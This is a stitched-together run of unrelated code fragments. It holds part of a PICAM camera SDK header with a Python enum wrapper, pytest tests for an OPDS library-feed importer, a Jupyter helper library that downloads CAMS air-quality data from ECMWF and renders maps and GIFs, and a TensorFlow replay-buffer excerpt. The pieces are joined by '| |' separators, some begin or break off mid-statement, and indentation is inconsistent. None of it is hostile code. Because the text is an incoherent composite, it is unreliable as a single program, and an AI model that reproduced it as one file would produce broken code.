const PicamModel** model_array,
piint* model_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
PICAM_API Picam_ConnectDemoCamera(
PicamModel model,
const pichar* serial_number,
PicamCameraID* id );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DisconnectDemoCamera( const PicamCameraID* id );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_IsDemoCamera(
const PicamCameraID* id,
pibln* demo );
/*----------------------------------------------------------------------------*/
/******************************************************************************/
/******************************************************************************/
/******************************************************************************/
/******************************************************************************/
/* Camera Parameter Values, Information, Constraints and Commitment */
/******************************************************************************/
/******************************************************************************/
/******************************************************************************/
/******************************************************************************/
/*----------------------------------------------------------------------------*/
/* Camera Parameters ---------------------------------------------------------*/
/*----------------------------------------------------------------------------*/
typedef enum PicamValueType
{
/*------------------------------------------------------------------------*/
/* Integral Types --------------------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_Integer = 1,
PicamValueType_Boolean = 3,
PicamValueType_Enumeration = 4,
/*------------------------------------------------------------------------*/
/* Large Integral Type ---------------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_LargeInteger = 6,
/*------------------------------------------------------------------------*/
/* Floating Point Type ---------------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_FloatingPoint = 2,
/*------------------------------------------------------------------------*/
/* Regions of Interest Type ----------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_Rois = 5,
/*------------------------------------------------------------------------*/
/* Pulse Type ------------------------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_Pulse = 7,
/*------------------------------------------------------------------------*/
/* Custom Intensifier Modulation Sequence Type ---------------------------*/
/*------------------------------------------------------------------------*/
PicamValueType_Modulations = 8
/*------------------------------------------------------------------------*/
} PicamValueType; /* (9) */
"""
PicamValueTypeEnum = PI_Enum(
"PicamValueType", dict(
#/*------------------------------------------------------------------------*/
#/* Integral Types --------------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamValueType_Integer = 1,
PicamValueType_Boolean = 3,
PicamValueType_Enumeration = 4,
#/*------------------------------------------------------------------------*/
#/* Large | |
in a
# <simplified:message> tag in unrecognized_identifier.opds.
key = "http://www.gutenberg.org/ebooks/100"
assert [key] == list(failures.keys())
failure = failures[key]
assert "404: I've never heard of this work." == failure.exception
assert key == failure.obj.urn
def test_extract_messages(self):
parser = OPDSXMLParser()
feed = self.sample_opds("unrecognized_identifier.opds")
root = etree.parse(StringIO(feed))
[message] = OPDSImporter.extract_messages(parser, root)
assert "urn:librarysimplified.org/terms/id/Gutenberg ID/100" == message.urn
assert 404 == message.status_code
assert "I've never heard of this work." == message.message
def test_extract_medium(self):
m = OPDSImporter.extract_medium
# No tag -- the default is used.
assert "Default" == m(None, "Default")
def medium(additional_type, format, default="Default"):
# Make an <atom:entry> tag with the given tags.
# Parse it and call extract_medium on it.
entry = '<entry xmlns:schema="http://schema.org/" xmlns:dcterms="http://purl.org/dc/terms/"'
if additional_type:
entry += ' schema:additionalType="%s"' % additional_type
entry += ">"
if format:
entry += "<dcterms:format>%s</dcterms:format>" % format
entry += "</entry>"
tag = etree.parse(StringIO(entry))
return m(tag.getroot(), default=default)
audio_type = random.choice(MediaTypes.AUDIOBOOK_MEDIA_TYPES) + ";param=value"
ebook_type = random.choice(MediaTypes.BOOK_MEDIA_TYPES) + ";param=value"
# schema:additionalType is checked first. If present, any
# potentially contradictory information in dcterms:format is
# ignored.
assert Edition.AUDIO_MEDIUM == medium(
"http://bib.schema.org/Audiobook", ebook_type
)
assert Edition.BOOK_MEDIUM == medium("http://schema.org/EBook", audio_type)
# When schema:additionalType is missing or not useful, the
# value of dcterms:format is mapped to a medium using
# Edition.medium_from_media_type.
assert Edition.AUDIO_MEDIUM == medium("something-else", audio_type)
assert Edition.BOOK_MEDIUM == medium(None, ebook_type)
# If both pieces of information are missing or useless, the
# default is used.
assert "Default" == medium(None, None)
assert "Default" == medium("something-else", "image/jpeg")
    def test_handle_failure(self):
        """handle_failure() resolves a URN to an Identifier (applying the
        importer's identifier_mapping) and passes the failure object through
        -- unless the 'failure' is itself an Identifier, which is treated
        as a success.
        """
        axis_id = self._identifier(identifier_type=Identifier.AXIS_360_ID)
        axis_isbn = self._identifier(Identifier.ISBN, "9781453219539")
        # Requests for the ISBN identifier should be mapped onto the
        # Axis 360 identifier.
        identifier_mapping = {axis_isbn: axis_id}
        importer = OPDSImporter(
            self._db,
            collection=None,
            data_source_name=DataSource.OA_CONTENT_SERVER,
            identifier_mapping=identifier_mapping,
        )
        # The simplest case -- an identifier associated with a
        # CoverageFailure. The Identifier and CoverageFailure are
        # returned as-is.
        input_failure = CoverageFailure(object(), "exception")
        urn = "urn:isbn:9781449358068"
        expect_identifier, ignore = Identifier.parse_urn(self._db, urn)
        identifier, output_failure = importer.handle_failure(urn, input_failure)
        assert expect_identifier == identifier
        assert input_failure == output_failure
        # A normal OPDSImporter would consider this a failure, but
        # because the 'failure' is an Identifier, not a
        # CoverageFailure, we're going to treat it as a success.
        identifier, not_a_failure = importer.handle_failure(
            "urn:isbn:9781449358068", self._identifier()
        )
        assert expect_identifier == identifier
        assert identifier == not_a_failure
        # Note that the 'failure' object returned is the Identifier that
        # was passed in, not the Identifier that substituted as the 'failure'.
        # (In real usage, though, they should be the same.)
        # An identifier that maps to some other identifier,
        # associated with a CoverageFailure.
        identifier, output_failure = importer.handle_failure(
            axis_isbn.urn, input_failure
        )
        assert axis_id == identifier
        assert input_failure == output_failure
        # An identifier that maps to some other identifier,
        # in a scenario where what OPDSImporter considers failure
        # is considered success.
        identifier, not_a_failure = importer.handle_failure(
            axis_isbn.urn, self._identifier()
        )
        assert axis_id == identifier
        assert axis_id == not_a_failure
def test_coveragefailure_from_message(self):
"""Test all the different ways a <simplified:message> tag might
become a CoverageFailure.
"""
data_source = DataSource.lookup(self._db, DataSource.OA_CONTENT_SERVER)
def f(*args):
message = OPDSMessage(*args)
return OPDSImporter.coveragefailure_from_message(data_source, message)
# If the URN is invalid we can't create a CoverageFailure.
invalid_urn = f("urnblah", "500", "description")
assert invalid_urn == None
identifier = self._identifier()
# If the 'message' is that everything is fine, no CoverageFailure
# is created.
this_is_fine = f(identifier.urn, "200", "description")
assert None == this_is_fine
# Test the various ways the status code and message might be
# transformed into CoverageFailure.exception.
description_and_status_code = f(identifier.urn, "404", "description")
assert "404: description" == description_and_status_code.exception
assert identifier == description_and_status_code.obj
description_only = f(identifier.urn, None, "description")
assert "description" == description_only.exception
status_code_only = f(identifier.urn, "404", None)
assert "404" == status_code_only.exception
no_information = f(identifier.urn, None, None)
assert "No detail provided." == no_information.exception
    def test_coveragefailure_from_message_with_success_status_codes(self):
        """When an OPDSImporter defines SUCCESS_STATUS_CODES, messages with
        those status codes are always treated as successes.
        """

        class Mock(OPDSImporter):
            # 999 is not a real HTTP success code; it verifies that any
            # listed code is honored, not just 2xx.
            SUCCESS_STATUS_CODES = [200, 999]

        data_source = DataSource.lookup(self._db, DataSource.OVERDRIVE)

        def f(*args):
            # Helper: wrap the args in an OPDSMessage and convert it.
            message = OPDSMessage(*args)
            return Mock.coveragefailure_from_message(data_source, message)

        identifier = self._identifier()
        # If the status code is 999, then the identifier is returned
        # instead of a CoverageFailure -- we know that 999 means
        # coverage was in fact provided.
        failure = f(identifier.urn, "999", "hooray!")
        assert identifier == failure
        # If the status code is 200, then the identifier is returned
        # instead of None.
        failure = f(identifier.urn, "200", "ok!")
        assert identifier == failure
        # If the status code is anything else, a CoverageFailure
        # is returned.  (Note: 500 is passed as an int here, unlike the
        # string codes above.)
        failure = f(identifier.urn, 500, "hooray???")
        assert isinstance(failure, CoverageFailure)
        assert "500: hooray???" == failure.exception
    def test_extract_metadata_from_elementtree_handles_messages_that_become_identifiers(
        self,
    ):
        """A message that coveragefailures_from_messages converts into an
        Identifier (rather than a CoverageFailure) still shows up in the
        'failures' dict, keyed by its URN.
        """
        not_a_failure = self._identifier()

        class MockOPDSImporter(OPDSImporter):
            @classmethod
            def coveragefailures_from_messages(
                cls, data_source, message, success_on_200=False
            ):
                """No matter what input we get, we act as though there were
                a single simplified:message tag in the OPDS feed, which we
                decided to treat as success rather than failure.
                """
                return [not_a_failure]

        data_source = DataSource.lookup(self._db, DataSource.OA_CONTENT_SERVER)
        values, failures = MockOPDSImporter.extract_metadata_from_elementtree(
            self.content_server_mini_feed, data_source
        )
        # The substituted Identifier is keyed by its own URN.
        assert {not_a_failure.urn: not_a_failure} == failures
    def test_extract_metadata_from_elementtree_handles_exception(self):
        """An exception raised while processing an <entry> becomes a
        transient CoverageFailure instead of aborting the whole feed.
        """

        class DoomedElementtreeOPDSImporter(OPDSImporter):
            """An importer that can't extract metadata from elementtree."""

            @classmethod
            def _detail_for_elementtree_entry(cls, *args, **kwargs):
                raise Exception("Utter failure!")

        data_source = DataSource.lookup(self._db, DataSource.OA_CONTENT_SERVER)
        (
            values,
            failures,
        ) = DoomedElementtreeOPDSImporter.extract_metadata_from_elementtree(
            self.content_server_mini_feed, data_source
        )
        # No metadata was extracted.
        assert 0 == len(list(values.keys()))
        # There are 3 CoverageFailures - every <entry> threw an
        # exception and the <simplified:message> indicated failure.
        assert 3 == len(failures)
        # The entry with the 202 message became an appropriate
        # CoverageFailure because its data was not extracted through
        # extract_metadata_from_elementtree.
        failure = failures["http://www.gutenberg.org/ebooks/1984"]
        assert isinstance(failure, CoverageFailure)
        assert True == failure.transient
        assert failure.exception.startswith("202")
        assert "Utter failure!" not in failure.exception
        # The other entries became generic CoverageFailures due to the failure
        # of extract_metadata_from_elementtree.
        failure = failures["urn:librarysimplified.org/terms/id/Gutenberg%20ID/10441"]
        assert isinstance(failure, CoverageFailure)
        assert True == failure.transient
        assert "Utter failure!" in failure.exception
        failure = failures["urn:librarysimplified.org/terms/id/Gutenberg%20ID/10557"]
        assert isinstance(failure, CoverageFailure)
        assert True == failure.transient
        assert "Utter failure!" in failure.exception
def test_import_exception_if_unable_to_parse_feed(self):
feed = "I am not a feed."
importer = OPDSImporter(self._db, collection=None)
pytest.raises(etree.XMLSyntaxError, importer.import_from_feed, feed)
def test_import(self):
feed = self.content_server_mini_feed
imported_editions, pools, works, failures = OPDSImporter(
self._db, collection=None
).import_from_feed(feed)
[crow, mouse] = sorted(imported_editions, key=lambda x: x.title)
# By default, this feed is treated as though it came from the
# metadata wrangler. No Work has been created.
assert DataSource.METADATA_WRANGLER == crow.data_source.name
assert None == crow.work
assert [] == crow.license_pools
assert Edition.BOOK_MEDIUM == crow.medium
# not even the 'mouse'
assert None == mouse.work
assert Edition.PERIODICAL_MEDIUM == mouse.medium
# Three links have been added to the identifier of the 'mouse'
# edition.
image, thumbnail, description = sorted(
mouse.primary_identifier.links, key=lambda x: x.rel
)
# A Representation was imported for the summary with known
# content.
description_rep = description.resource.representation
assert b"This is a summary!" == description_rep.content
assert Representation.TEXT_PLAIN == description_rep.media_type
# A Representation was imported for the image with a media type
# inferred from its URL.
image_rep = image.resource.representation
assert image_rep.url.endswith("_9.png")
assert Representation.PNG_MEDIA_TYPE == image_rep.media_type
# The thumbnail was imported similarly, and its representation
# was marked as a thumbnail of the full-sized image.
thumbnail_rep = thumbnail.resource.representation
assert Representation.PNG_MEDIA_TYPE == thumbnail_rep.media_type
assert image_rep == thumbnail_rep.thumbnail_of
# Two links were added to the identifier of the 'crow' edition.
[broken_image, working_image] = sorted(
crow.primary_identifier.links, key=lambda x: x.resource.url
)
# Because these images did not have a specified media type or a
# distinctive extension, and we have not actually retrieved
# the URLs yet, we were not able to determine their media type,
# so they have no associated Representation.
assert broken_image.resource.url.endswith("/broken-cover-image")
assert working_image.resource.url.endswith("/working-cover-image")
assert None == broken_image.resource.representation
assert None == working_image.resource.representation
# Three measurements have been added to the 'mouse' edition.
popularity, quality, rating = sorted(
[x for x in mouse.primary_identifier.measurements if x.is_most_recent],
key=lambda x: x.quantity_measured,
)
assert DataSource.METADATA_WRANGLER == popularity.data_source.name
assert Measurement.POPULARITY == popularity.quantity_measured
assert 0.25 == popularity.value
assert DataSource.METADATA_WRANGLER == quality.data_source.name
assert Measurement.QUALITY == quality.quantity_measured
assert 0.3333 == quality.value
assert DataSource.METADATA_WRANGLER == rating.data_source.name
assert Measurement.RATING == rating.quantity_measured
assert 0.6 == rating.value
seven, children, courtship, fantasy, pz, magic, new_york = sorted(
mouse.primary_identifier.classifications, key=lambda x: x.subject.name
)
pz_s = pz.subject
assert "Juvenile Fiction" == pz_s.name
assert "PZ" == pz_s.identifier
new_york_s = new_york.subject
assert "New York (N.Y.) -- Fiction" == new_york_s.name
assert "sh2008108377" | |
<reponame>VincentSaleh/Mundi_NotebookUsage<filename>lib/internal_lib/camslib.py
#!/usr/bin/python
# -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2019 Mundi Web Services
# Licensed under the 3-Clause BSD License; you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# https://opensource.org/licenses/BSD-3-Clause
#
# Author : <NAME> / <NAME>
#
# Contact email: <EMAIL>
# =============================================================================
import datetime
import matplotlib.colors as colors
import matplotlib.pyplot as plt
import numpy as np
import os
from datetime import timedelta
from matplotlib.colors import ListedColormap
from matplotlib.pyplot import figure
os.environ["PROJ_LIB"] = r"/opt/conda/share/proj"
from mpl_toolkits.basemap import Basemap
from PIL import Image
import string
import requests
import ipywidgets as widgets
from IPython.display import display, clear_output
from owslib.wcs import WebCoverageService
from owslib.wms import WebMapService
from ecmwfapi import ECMWFDataServer
import ecmwfapi
from IPython.display import Image
import glob
from IPython.display import clear_output, HTML, Image
from PIL import Image, ImageDraw, ImageFont, ImageOps
import pygrib
import imageio
from tqdm import tqdm
from os import path
# CAMS regional air-quality service endpoints.
server_url = "https://geoservices.regional.atmosphere.copernicus.eu/services/"
dlserver = "https://download.regional.atmosphere.copernicus.eu/services/CAMS50?"
# Valid values for the CAMS50 request parameters.
methods = ["FORECAST", "ANALYSIS"]
pollens = ["BIRCHPOLLEN", "OLIVEPOLLEN", "GRASSPOLLEN", "RAGWEEDPOLLEN"]
species = ["O3", "CO", "NH3", "NO", "NO2", "NMVOC", "PANs", "PM10", "PM2.5", "SO2" ] + pollens
models = ["ENSEMBLE", "CHIMERE", "EMEP", "EURAD", "LOTOSEUROS", "MATCH", "MOCAGE", "SILAM"]
# Altitude levels in meters.
levels = [0, 50, 250, 500, 1000, 2000, 3000, 5000]
# Choices offered by the notebook GUI widgets (projections, matplotlib
# colormap names, color direction, and the atmosphere-data labels consumed
# by parameter_value()).
dict_projection_map = ["WORLD","AFRICA", "ASIA", "EUROPE","NORTH-AMERICA","NORTH-POLE", "OCEANIA", "SOUTH-AMERICA","SOUTH-POLE"]
dict_color_map = ['ocean', 'gist_earth', 'terrain', 'gist_stern','gnuplot', 'gnuplot2',
                  'CMRmap', 'brg','hsv', 'jet', 'nipy_spectral', 'gist_ncar', 'tab20b', 'tab20c']
color_display_direction = ["Left to right", "Right to left"]
data_parameters = ["Nitrogen dioxyde", "Ozone", "Sulfur dioxyde", "Particulate Matter <2.5 um", "Particulate Matter <10 um" ]
# Output locations inside the notebook container (the hard-coded /home/jovyan
# prefix assumes the standard Jupyter image).
SAVE_FOLDER_IMAGES = "/home/jovyan/work/cams_data/cams_ecmwfapi/images_data/"
SAVE_FOLDER_GIF = "/home/jovyan/work/cams_data/cams_ecmwfapi/"
# ----------------------------------------------------------------
# CAMS ECMWFAPI notebook functions:
# ----------------------------------------------------------------
def setup_dir():
    """Return the destination folder for downloaded CAMS images,
    located under the current user's home directory.
    """
    home = os.environ['HOME']
    return path.join(home, 'work/cams_data/cams_ecmwfapi/images_data/')
def setup(output_dir):
"""This function creates the folder output_dir if it doesn't exist"""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
output_filename = path.join(output_dir, 'output.grib')
return output_filename
def configure_ecmwfapi():
    """This function allows to log onto the ecmwfapi service.

    Displays email/key text widgets plus a Validate button; clicking the
    button writes the credentials to ``$HOME/.ecmwfapirc`` in the JSON
    format expected by the ``ecmwfapi`` client.
    """
    # Text fields for the user's ECMWF credentials.
    ecmwfapi_email_widget = widgets.Text(
        value='',
        placeholder='Enter your email to log in ECMWF',
        description='Your Email',
        disabled=False
    )
    ecmwfapi_key_widget = widgets.Text(
        value='',
        placeholder='Enter your ECMWF Key',
        description='Your Key',
        disabled=False
    )
    button_widget = widgets.Button(
        description='Validate',
        disabled=False,
        button_style='',
        tooltip='Click me',
    )
    output_widget = widgets.Output(
    )
    display(ecmwfapi_email_widget)
    display(ecmwfapi_key_widget)
    display(button_widget)
    display(output_widget)

    def click_configure_ecmwfapi(b):
        # Button callback: echo the credentials and persist them to the
        # ecmwfapi client's config file.
        with output_widget:
            ecmwf_email = ecmwfapi_email_widget.value
            ecmwf_key = ecmwfapi_key_widget.value
            print('Your ECMWF login email is : ' + ecmwf_email + ', and your ECMWF Key is : ' + ecmwf_key)
            content = f'{{\n "url" : "https://api.ecmwf.int/v1",\n "key" : "{ecmwf_key}",\n "email" : "{ecmwf_email}"\n}}'
            # write content to $HOME/.ecmwfapirc
            with open(path.join(os.environ["HOME"], '.ecmwfapirc'), 'w') as f:
                f.write(content)
    button_widget.on_click(click_configure_ecmwfapi)
def request_ecmwfapi(output_filename):
    """This function creates a request to the ECMWFAPI service with parameters asked in the GUI
    and generates the output.grib file containing resulting data.

    Parameters
    ----------
    output_filename: string
        folder where the output.grib file will be stored
    """
    # Dropdown of atmosphere-data labels (see module-level data_parameters).
    data_parameter_widget = widgets.Dropdown(
        options=data_parameters,
        description='Data selection',
    )
    # Default window: 45 days ago up to 15 days ago -- presumably because
    # the analysis dataset lags real time; TODO confirm against CAMS docs.
    start_date_widget = widgets.DatePicker(
        description='Starting Date',
        value=datetime.date.today() - datetime.timedelta(45),
        disabled=False
    )
    current_date_widget = widgets.DatePicker(
        description='Final date',
        value=datetime.date.today() - datetime.timedelta(15),
        disabled=False)
    # Optional extra analysis times; 00:00:00 is always requested.
    hour_06 = widgets.Checkbox(
        value=False,
        description='06:00:00',
        disabled=False,
        indent=True
    )
    hour_12 = widgets.Checkbox(
        value=False,
        description='12:00:00',
        disabled=False,
        indent=True
    )
    hour_18 = widgets.Checkbox(
        value=False,
        description='18:00:00',
        disabled=False,
        indent=True
    )
    label_hour = widgets.VBox([widgets.Label(value="Select one or many hours below :"), hour_06, hour_12, hour_18])
    button = widgets.Button(description='Validate')
    out = widgets.Output()
    display(data_parameter_widget)
    display(start_date_widget)
    display(current_date_widget)
    display(label_hour)
    display(button)
    display(out)

    def click_ecmwfapi_request(b):
        # Button callback: build the "/"-separated time list from the
        # checkboxes and submit the MARS-style retrieval; blocks until the
        # server has written output_filename.
        with out:
            time_6 = ""
            time_12 = ""
            time_18 = ""
            if hour_06.value == True:
                time_6 = "/06:00:00"
            if hour_12.value == True:
                time_12 = "/12:00:00"
            if hour_18.value == True:
                time_18 = "/18:00:00"
            time_param = time_6 + time_12 + time_18
            server = ecmwfapi.ECMWFDataServer()
            server.retrieve({
                "class": "mc",
                "dataset": "cams_nrealtime",
                "date": str(start_date_widget.value) + "/to/" + str(current_date_widget.value),
                "expver": "0001",
                "levtype": "sfc",
                "param": parameter_value(data_parameter_widget.value),
                "step": "0",
                "stream": "oper",
                "time": "00:00:00" + time_param,
                "type": "an",
                "target": output_filename,
            })
    button.on_click(click_ecmwfapi_request)
def parameter_value(atmosphere_data_parameter):
    """Return the ECMWF GRIB parameter code for a GUI atmosphere-data label.

    Parameters
    ----------
    atmosphere_data_parameter: string
        Atmosphere data parameter selected in the GUI (one of the
        module-level ``data_parameters`` labels).

    Returns
    -------
    data_param: string
        The data parameter value used in the ECMWFAPI request.

    Raises
    ------
    ValueError
        If the label is unknown.  (The original if/elif chain raised an
        obscure UnboundLocalError in that case.)
    """
    # Mapping of GUI labels to ECMWF GRIB parameter codes.
    codes = {
        "Nitrogen dioxyde": "125.210",
        "Ozone": "206.210",
        "Sulfur dioxyde": "126.210",
        "Particulate Matter <2.5 um": "73.210",
        "Particulate Matter <10 um": "74.210",
    }
    try:
        return codes[atmosphere_data_parameter]
    except KeyError:
        raise ValueError(
            f"Unknown atmosphere data parameter: {atmosphere_data_parameter!r}"
        ) from None
def get_projection_map(output_dir, output_filename):
    """ This function allows to define what kind of projection map the user wants to display data

    Parameters
    ----------
    output_dir: string
        folder where output.grib and img are stored.
    output_filename : string
        output.grib location
    """
    # Dropdown of continent/world projections (see dict_projection_map).
    projection_widget = widgets.Dropdown(
        options=dict_projection_map,
        description='Map Location',
    )
    button = widgets.Button(description='Validate')
    out = widgets.Output()
    display(projection_widget)
    display(button)
    display(out)

    def click_projection_map(b):
        # Button callback: proceed to the colormap-selection step with the
        # chosen projection.
        with out:
            clear_output(wait=True)
            get_color_map(output_dir, output_filename, projection_widget.value)
    button.on_click(click_projection_map)
def get_color_map(output_dir, output_filename, projection):
    """ This function allows to display the Matplotlib colormap possibilities and gives the right to the user to define
    what kind of colormap and direction way he wants to display data.

    Parameters
    ----------
    output_dir: string
        folder where output.grib and img are stored.
    output_filename : string
        output.grib location
    projection : string
        the continent where data will be displayed
    """
    # displaying colormaps sample:
    gradient = np.linspace(0, 1, 256)
    gradient = np.vstack((gradient, gradient))
    fig, axes = plt.subplots(nrows=len(dict_color_map))
    fig.subplots_adjust(top=0.95, bottom=0.01, left=0.2, right=0.99)
    axes[0].set_title('Colormaps sample', fontsize=14)
    for ax, name in zip(axes, dict_color_map):
        # One horizontal gradient strip per colormap, labelled on the left.
        ax.imshow(gradient, aspect='auto', cmap=plt.get_cmap(name))
        pos = list(ax.get_position().bounds)
        x_text = pos[0] - 0.01
        y_text = pos[1] + pos[3] / 2.
        fig.text(x_text, y_text, name, va='center', ha='right', fontsize=10)
    # Turn off *all* ticks & spines, not just the ones with colormaps.
    for ax in axes:
        ax.set_axis_off()
    plt.show()
    # defining colormap user choice:
    color_map_widget = widgets.Dropdown(
        options=dict_color_map,
        description='Map colors',
        value="gist_ncar"
    )
    color_display_direction_widget = widgets.Dropdown(
        options=color_display_direction,
        description='Display direction',
    )
    image_title_widget = widgets.Text(
        value='',
        placeholder='Enter your title',
        description='Title',
        disabled=False
    )
    gif_filename_widget = widgets.Text(
        value='',
        placeholder='Enter the GIF file name',
        description='GIF file name',
        disabled=False
    )
    button = widgets.Button(description='Validate')
    out = widgets.Output()
    display(color_map_widget)
    display(color_display_direction_widget)
    display(image_title_widget)
    display(gif_filename_widget)
    display(button)
    display(out)

    def click_color_map(b):
        # Button callback: derive the final colormap name (matplotlib
        # reversed maps use the "_r" suffix), fill in filename defaults,
        # then start the per-frame image download.
        with out:
            color_map = color_map_widget.value
            if color_display_direction_widget.value == color_display_direction[1]:
                color_map = color_map + "_r"
            if (image_title_widget.value == '') and (gif_filename_widget.value == ''):
                gif_filename_widget.value = "your_gif_file"
            elif (gif_filename_widget.value == ''):
                gif_filename_widget.value = image_title_widget.value
            print("Images download is starting !")
            clear_output(wait=True)
            download_images(output_filename, output_dir, projection, color_map, image_title_widget.value,
                            gif_filename_widget.value)
    button.on_click(click_color_map)
def download_images(output_filename, output_dir, projection, color_map, image_title, gif_filename):
    """ This function allows to download the data in the output.grib file and build each image

    Parameters
    ----------
    output_dir: string
        folder where output.grib and img are stored.
    output_filename : string
        output.grib location
    projection : string
        the continent where data will be displayed
    color_map : string
        the color range selected to display data
    image_title : string
        the title displayed on each image
    gif_filename : string
        the name of the gif file
    """
    # open a GRIB file
    with pygrib.open(output_filename) as grbs:
        # NOTE(review): the color scale (vmax) and units are taken from the
        # *first* GRIB message only and reused for every frame -- presumably
        # all messages carry the same parameter; verify for multi-parameter
        # files.
        grb = grbs.select()[0]
        vmax = np.amax(grb.values)
        unit = grb['units']
        # get the longitudes and the latitudes
        latitudes, longitudes = grb.latlons()
        # Emptying the folder which contains precedent img.
        # NOTE(review): this hard-coded path duplicates SAVE_FOLDER_IMAGES;
        # keep the two in sync.  Also, the glob pattern "[!output.grib]*" is
        # a single-character class (first char not in "outpg.rib"), not a
        # "skip output.grib" filter -- TODO confirm intended behavior.
        if not os.path.exists("/home/jovyan/work/cams_data/cams_ecmwfapi/images_data/"):
            os.makedirs("/home/jovyan/work/cams_data/cams_ecmwfapi/images_data/")
        files = glob.glob(f'{"/home/jovyan/work/cams_data/cams_ecmwfapi/images_data/"}[!output.grib]*')
        for f in files:
            os.remove(f)
        cpt = 1
        # create and save a figure for each grib message
        for grb in grbs.select():
            figure(num=None, figsize=(16, 10))
            # create a map
            map_ = get_basemap(projection, grb)
            map_.drawcoastlines()
            map_.drawcountries()
            x, y = map_(longitudes, latitudes)
            data = grb.values
            # display the data
            cs = map_.pcolormesh(x, y, data, cmap=plt.get_cmap(color_map), vmin=0, vmax=vmax)
            map_.colorbar(cs, label=unit)
            plt.title(str(image_title) + f' / {grb["parameterName"]} / date: {grb["dataDate"]} / hour: {grb["hour"]}',
                      loc='left')
            # Each frame is saved under its GRIB message number so frames
            # sort into chronological order for the GIF step.
            plt.savefig(path.join(output_dir, f'{grb.messagenumber}'))
            plt.close()
            print("\r #Image - " + str(cpt) + "/" + str(np.size(grbs.select())) + " downloaded")
            cpt += 1
            clear_output(wait=True)
    print("Your img have been successfully downloaded !")
    display_GIF_images(output_dir, gif_filename)
def get_basemap(projection, grb):
""" This function returns the Basemap corresponding to the projection map selected in the GUI.
Parameters
----------
projection : string
the continent where data will be displayed
Returns
-------
map_:
the Basemap builds to display data
"""
# get the longitudes and the latitudes
latitudes, longitudes = grb.latlons()
if projection == "WORLD":
map_ = Basemap(projection='cyl', lat_ts=10, llcrnrlon=longitudes.min(),
urcrnrlon=longitudes.max(), llcrnrlat=latitudes.min(), urcrnrlat=latitudes.max(), resolution='l')
elif projection == "AFRICA":
map_ = Basemap(width=12000000, height=9000000, resolution='l', projection='eqdc', lat_1=-45., lat_2=36, lat_0=0,
lon_0=22.)
elif projection == "SOUTH-AMERICA":
map_ = Basemap(width=12000000, height=9000000, resolution='l', projection='eqdc', lat_1=-55., lat_2=12,
lat_0=-26, lon_0=-60.)
elif projection == "ASIA":
map_ = Basemap(width=12000000, height=9000000, resolution='l', projection='eqdc', lat_1=10., lat_2=70, lat_0=45,
lon_0=100.)
elif projection == "EUROPE":
map_ = Basemap(width=8000000, height=7000000, resolution='l', projection='eqdc', lat_1=40., lat_2=60, lon_0=35,
lat_0=50)
elif projection == "NORTH-AMERICA":
map_ = Basemap(width=12000000, height=9000000, resolution='l', projection='eqdc', lat_1=45., lat_2=55, lat_0=50,
lon_0=-107.)
elif | |
`extend_episodes`; those methods will return an updated set of episode id
values in their output. To keep track of updated episode IDs across
multiple TF1 session run calls, the `episode_ids` may be read out and passed
back in by the user, or stored in a `tf.Variable`. A helper class which
does this for you is available in this module, it is called
`StatefulEpisodicReplayBuffer`.
A simple non-`Variable` way to do this (in TF1) is:
```python
data = collect_data_tf_op()
episode_ids = tf.placeholder_with_default(rb.create_episode_ids(3), [3])
new_episode_ids = rb.add_batch(data, episode_ids)
ids = session.run(episode_ids)
while True:
...
ids = session.run(new_episode_ids, feed_dict=dict(episode_ids=ids))
```
The initial value of these ids is subject to change, but currently set
to `-1`. When methods like `add_batch` see entries like this, they
reserve a new (valid) id for this entry in the buffer and return the
associated id in this location.
Args:
num_episodes: (Optional) int32, number of episode IDs to create.
This may be a tensor. If `None`, a scalar ID tensor is returned.
Returns:
An int64 Tensor containing initial episode(s) ID(s).
Raises:
ValueError: If `num_episodes` is bigger than capacity, or non-scalar.
"""
if tf.is_tensor(num_episodes):
if num_episodes.shape.rank != 0:
raise ValueError('num_episodes must be a scalar, but saw shape: {}'
.format(num_episodes.shape))
return tf.fill(
[num_episodes],
tf.convert_to_tensor(_INVALID_EPISODE_ID, dtype=tf.int64),
name='episode_id')
shape = ()
if num_episodes is not None and num_episodes > 0:
if num_episodes > self._capacity:
raise ValueError('Buffer cannot create episode_ids when '
'num_episodes {} > capacity {}.'.format(
num_episodes, self._capacity))
shape = (num_episodes,)
return tf.constant(
_INVALID_EPISODE_ID, shape=shape, dtype=tf.int64, name='episode_id')
def add_sequence(self, items, episode_id):
    """Adds a sequence of items to the replay buffer for the selected episode.

    Args:
      items: A sequence of items to be added to the buffer. Items will have the
        same structure as the data_spec of this class, but the tensors in items
        will have an outer sequence dimension in addition to the corresponding
        spec in data_spec.
      episode_id: A scalar Tensor containing the current episode_id.

    Returns:
      An updated episode id Tensor. Accessing this episode id value will,
      as a side effect, start or end the current episode in the buffer.
    """
    # This entry point handles exactly one episode (contrast with add_batch).
    episode_id.shape.assert_has_rank(0)
    with tf.device(self._device):
        with tf.name_scope('add_steps'):
            # If users pass in, e.g., a python list [2, 3, 4] of type int32
            # but the data_spec requires an int64, then the user will get a very
            # confusing error much deeper in the TensorList code. Doing the
            # conversion here either converts when necessary, or raises an error
            # on incompatible types earlier in the run.
            items = tf.nest.map_structure(
                lambda x, spec: tf.convert_to_tensor(value=x, dtype=spec.dtype),
                items, self._data_spec)
            item_0 = tf.nest.flatten(items)[0]
            # Prefer the statically-known sequence length; fall back to the
            # dynamic shape when the outer dimension is unknown at graph time.
            num_steps = tf.cast(
                tf.compat.dimension_value(item_0.shape[0]) or
                tf.shape(input=item_0)[0], tf.int64)
            # If begin_episode is True, then the increment of the episode_id happens
            # before trying to add anything to the buffer, regardless of whether the
            # item will actually be added.
            begin_episode = self._begin_episode_fn(items)
            end_episode = self._end_episode_fn(items)
            new_episode_id = self._get_episode_id(
                episode_id, begin_episode, end_episode)
            episode_location = self._get_episode_id_location(new_episode_id)

            def _add_steps():
                """Add sequence of items to the buffer."""
                inc_episode_length = self._increment_episode_length_locked(
                    episode_location, num_steps)
                write_data_op = self._data_table.append(episode_location, items)
